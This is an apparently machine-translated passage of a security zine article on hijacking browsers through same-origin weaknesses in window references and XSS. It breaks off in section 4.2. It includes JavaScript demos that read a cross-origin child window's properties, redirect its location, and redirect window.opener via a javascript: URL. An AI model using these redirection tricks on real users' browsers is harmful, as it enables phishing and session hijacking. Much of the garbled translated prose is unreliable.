Browser hijacking using the window reference vulnerability and XSS Vulnerability

= Ph4nt0m Security Team =

Issue 0x03, Phile #0x05 of 0x07


| = --------------------------------------------------------------------------- = |
| = --------------- = [Browser hijacking using the window reference vulnerability and XSS vulnerability] = ------------- = |
| = --------------------------------------------------------------------------- = |
| = --------------------------------------------------------------------------- = |
| = ------------------------ = [By rayh4c] = --------------------------- = |
| = ---------------------- = [<Rayh4c # 80sec.com>] = ------------------------ = |
| = --------------------------------------------------------------------------- = |


[Directory]

1. Preface
2. Same-source policy summary
3. Understand the same-source policy of window objects
4. Same-source policy vulnerability in the window reference function
4.1 same-source policy for parent window referencing Child Window
4.2 same-source policy of parent window referenced in Child Window
5. Use the window reference vulnerability to hijack the browser
6. hijack the browser using the XSS Vulnerability
6.1 forward cross-window hijacking
6.2 reverse cross-window hijacking
6.3 extremely dangerous cross-frame window reference hijacking
6.4 extremely dangerous forward/reverse cross-window recursive hijacking
6.5 full browser control
7. Postscript
8. Reference


I. Preface

Recently, there have been few technical documents on XSS vulnerabilities in China, so I decided to write this document. Many of the details and comments
I have been talking with you for a long time, including my understanding of the same-source browser policy and XSS. XSS vulnerability from Session
Hijacking, phishing, xss worm and other mainstream attack methods have developed to the present, telling everyone that a real cross-site division will not be
Cross-Site teachers are constantly innovating. Cross-Site teachers will demonstrate all the possibilities of XSS vulnerabilities.


Ii. Same-source policy summary

The same-origin policy is the foundation of browser security. It is an important security standard for client scripts supported by browsers. We can
Learn about this security standard from the "Source". According to W3C standards, this "Source" includes domain names, protocols, and ports.
Once revealed many same-source policy vulnerabilities, the extent of harm varies, such as from 06 years since the popular MS06-014 web page
The same-source policy has been completely overturned. This document mainly refers to
Vulnerability, and then extended from the vulnerability to how the XSS vulnerability uses the same-source policy feature of DOM to realize browser hijacking.


3. Understand the same-source policy of window objects

Window refers to a browser window. Each browser window can be represented by a window object instance.
As there are many attributes and methods, you can write a simple script to review all the attributes and methods of the window object:

-- Code -------------------------------------------------------------------------
<Script language = "javascript">
For (p in window) document. write (p + "<br> ");
</Script>
-------------------------------------------------------------------------------

The properties and methods of these window objects can change the appearance of the window and the content of the window webpage.
When multiple window objects start to reference each other,
These attributes and methods must follow the same-origin policy.

For example, if you can call the properties and methods of the B .com webpage window object on the.com webpage
Cross-Site division can access any website on the XSS Internet. To avoid security issues, the same-origin policy is required.
. We can save the script as demo.html to a local directory or drop it to a remote server for testing.
The effect of scripts is to call the properties and methods of window objects in different source subwindows. We will find that
The value type is blank. This is a special case, indicating that the parent window of different sources references the location of the window object of the Child window.
The attribute is not denied.

--Demo.html --------------------------------------------------------------------
<Script language = "javascript">
Function allPrpos (obj ){
Var props = "<table> <tr> <td> name </td> <td> value </td> ";
For (var p in obj ){
If (typeof (obj [p]) = "function "){
Obj [p] ();
} Else {
Try
{
Props + = "<tr> <td>" + p + "</td> <td>" + obj [p] + "</td> </tr> ";
}
Catch (ex)
{

Props + = "<tr> <td>" + p + "</td> <td>" + ex. message + "</td> </tr> ";
}

}
}

Document. write (props + "</table> ");
}

Function createWin (){
NewWin = window. open ("http://www.google.com ");
SetTimeout (function () {allPrpos (newWin)}, 2000 );
}

</Script>

<Button onclick = createWin ()> Create a subwindow for test </button>
-------------------------------------------------------------------------------


Iv. Same-source policy vulnerability in window reference

4.1 same-source policy for parent window referencing Child Window

Last year I published an Internet Explorer 6 cross-origin scripting vulnerability in phantom magazine, which Microsoft has released a MS08-058 patch to fix,
However, this vulnerability still exposes the same-source policy issue that the parent window references the Child Window. Based on the test in Part 2, we know that
The browser does not prevent the parent window from accessing the location attribute value of the non-source sub-window. We can use the following script
The row test shows that the parent window can control the location attribute values of non-source subwindows.

--Vul1.html --------------------------------------------------------------------
<Script language = "javascript">
Function createWin (){
NewWin = window. open ("http://www.google.com ");
SetTimeout (function () {newWin. location = "http://www.80sec.com"}, 2000 );
}
</Script>

<Button onclick = createWin ()> Create a subwindow for test </button>
-------------------------------------------------------------------------------


4.2 same-source policy of parent window referenced in Child Window

A reverse test will find that the same problem exists when the child window references the parent window.
Use javascript pseudo protocol for verification. The window object attribute of the Child window reference parent window is window. opener. We
You can browse a website and click a link to open N webpages. Inject the following script into the address bar of These webpages. you must
We are surprised to find that the parent windows of the same source and non-same source are forwarded to the 80 SEC website.

-- Code -------------------------------------------------------------------------

Javascript: window. opener. location = "http://www.80sec.com"; void (0 );

-------------------------------------------------